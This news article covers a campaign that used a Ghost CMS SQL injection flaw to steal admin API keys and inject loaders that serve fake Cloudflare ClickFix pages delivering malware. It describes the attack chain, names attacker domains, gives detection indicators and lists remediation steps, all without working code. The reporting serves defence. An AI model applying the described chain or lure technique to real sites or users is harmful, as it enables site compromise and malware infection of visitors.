Threat actors have seized control of more than 700 websites powered by Ghost CMS. They did so by exploiting a critical SQL injection vulnerability patched months earlier. The attacks inject malicious JavaScript that feeds visitors into ClickFix social engineering schemes. These schemes trick users on Windows machines into pasting commands that download and run malware.
The vulnerability, tracked as CVE-2026-26980, carries a CVSS score of 9.4. It affects Ghost versions from 3.24.0 through 6.19.0. An unauthenticated attacker can read arbitrary data from the site’s database. That includes the admin API key. XLab at Qianxin first spotted the campaign targeting one of its clients on May 7, 2026. What began as a single incident quickly revealed a mass compromise operation.
Attackers don’t stop at theft. They use the stolen admin API key to call the Ghost Admin API. Specifically they issue PUT requests to /ghost/api/admin/posts/:id/. This lets them edit articles in bulk. They append a lightweight JavaScript loader at the bottom of pages. The loader fetches a more sophisticated cloaking script from attacker-controlled domains such as clo4shara.xyz. That script fingerprints the visitor’s browser environment. It checks WebGL, navigator properties, timezone, touch support and console behavior among other signals.
Based on the fingerprint the cloaking service decides what to serve next. Often it delivers an iframe that loads a counterfeit Cloudflare human verification page. The fake page from domains like cloud-verification.com tells the visitor they must complete a step to proceed. It instructs them to press Windows key plus R to open the Run dialog or directly open Command Prompt. Then it provides text that the user is urged to copy and paste with Ctrl plus V before hitting Enter.
The pasted command typically looks like this. It downloads a zip file, extracts it and executes a batch script or DLL. One observed update.bat runs PowerShell quietly to fetch installer.dll from a Storj share link then launches it with rundll32. The DLL in turn reaches out for additional payloads. These have included information stealers, remote access tools and even Electron-based executables. Some variants open a YouTube video in the background to distract the victim while the malware installs.
But the scale stands out. Bleeping Computer reported that compromised properties include university sites from Harvard, Oxford and Auburn as well as DuckDuckGo’s official blog. Other victims span AI and machine learning platforms, blockchain projects, SaaS companies, media outlets, fintech services and personal blogs. The trust users place in these legitimate domains boosts the success rate of the ClickFix lures. Visitors assume the verification step comes from the site itself.
And the campaign shows signs of competition. XLab researchers observed at least two separate threat groups racing to poison the same vulnerable instances. Some sites were hit by both groups within a single day. One group updated its payload on May 16 with a new installer.dll that evaded initial detection. The second wave of infections pushed the total past 700 domains. “We have cumulatively identified more than 700 domains that have been contaminated, including several globally renowned sites,” the XLab team stated in its analysis.
The flaw itself was discovered with help from Anthropic’s Claude AI model according to The Hacker News. Ghost developers released the fix in version 6.19.1 on February 19, 2026. That gave site operators more than two months to update before active exploitation began in earnest. Many did not. Ghost CMS runs on over 57,000 websites worldwide. It powers properties for organizations such as 404 Media, the Canadian government and Duolingo. The open-source platform’s popularity makes the unpatched population a rich target.
Once injected the malicious script uses techniques designed to run only once per visitor. Newer variants store state in localStorage to avoid repeated execution on the same device. The loader decodes a base64 string containing the command-and-control URL. It appends query parameters and sets an ID based on the page origin before dynamically adding a script tag. This two-stage design allows operators to swap out the final payload without touching the compromised sites again. They simply update what the cloaking service returns.
ClickFix as a technique has gained traction in recent years. It avoids traditional drive-by downloads or exploit kits. Instead it counts on users following instructions that feel like routine troubleshooting. The fake pages mimic real services with convincing copy, logos and even Ray IDs. Some prompts claim a connection issue or a need to review security before proceeding. The social engineering works particularly well on enterprise and academic users who may be conditioned to follow IT instructions.
Security teams have seen similar campaigns abuse compromised WordPress sites and other CMS platforms. Yet the Ghost incidents highlight a persistent problem. Even critical vulnerabilities with available patches go unaddressed for weeks or months. In this case the window between patch release and mass exploitation allowed attackers to scan the internet for vulnerable Ghost instances, extract keys and inject code at scale.
Remediation requires more than simply updating the CMS. Administrators must rotate all API keys, both admin and content variants, as well as admin passwords and active sessions. They should scan their database and article content for indicators such as references to ghost_once_footer_, atob combined with appendChild, or specific base64 strings tied to known command-and-control domains. Bulk removal of matching script tags is necessary. Logs for admin API calls should be retained for at least 30 days and reviewed for suspicious PUT requests to post endpoints around the time of the known attack waves.
TechRadar emphasized the need for urgent upgrades to Ghost 6.19.1 or newer along with close monitoring of those 30-day admin API logs. XLab strongly recommended that all Ghost users complete system upgrades and perform self-inspection and remediation. The researchers noted that the vast majority of their notifications to affected site owners had received no response so far.
Newer reporting from today underscores the ongoing risk. Malwarebytes Labs detailed how the injected JavaScript turns education and technology sites into distribution points for the same ClickFix chains. The campaign continues to evolve with operators refining their cloaking and payload delivery to stay ahead of detection.
Site operators running Ghost should treat this as an active intrusion campaign rather than a theoretical vulnerability. The presence of the loader script does not always trigger obvious breakage. Pages continue to load normally for most visitors. Only those who trigger the fingerprint match see the fake verification prompt. That stealth helps the compromised sites remain useful to attackers for weeks.
The incident also raises questions about discovery methods. That Anthropic’s Claude model helped uncover the original flaw points to growing reliance on AI-assisted code review in open-source projects. Yet it equally shows that even well-maintained platforms can ship critical logic errors in their API layers. The Content API endpoint apparently failed to sanitize inputs properly when handling certain filter or query parameters, opening the door to database extraction.
For organizations whose sites were hit the next steps are clear but tedious. Restore from clean backups where possible. Otherwise surgically remove the injected scripts at the database level. Change every credential. Notify downstream users who may have visited during the compromise window and advise them to scan their Windows systems for the known payloads. And update immediately to the latest Ghost release.
This episode serves as a reminder. Patching critical vulnerabilities in content management systems cannot wait. When those systems host content trusted by thousands of daily visitors the consequences stretch far beyond a defaced blog post. They reach into the endpoints of students, researchers, developers and professionals who simply wanted to read an article. The attackers counted on that trust. So far it appears many of them succeeded.
Ghost CMS Breach Exposes 700 Sites to ClickFix Malware via Unpatched SQL Flaw first appeared on Web and IT News.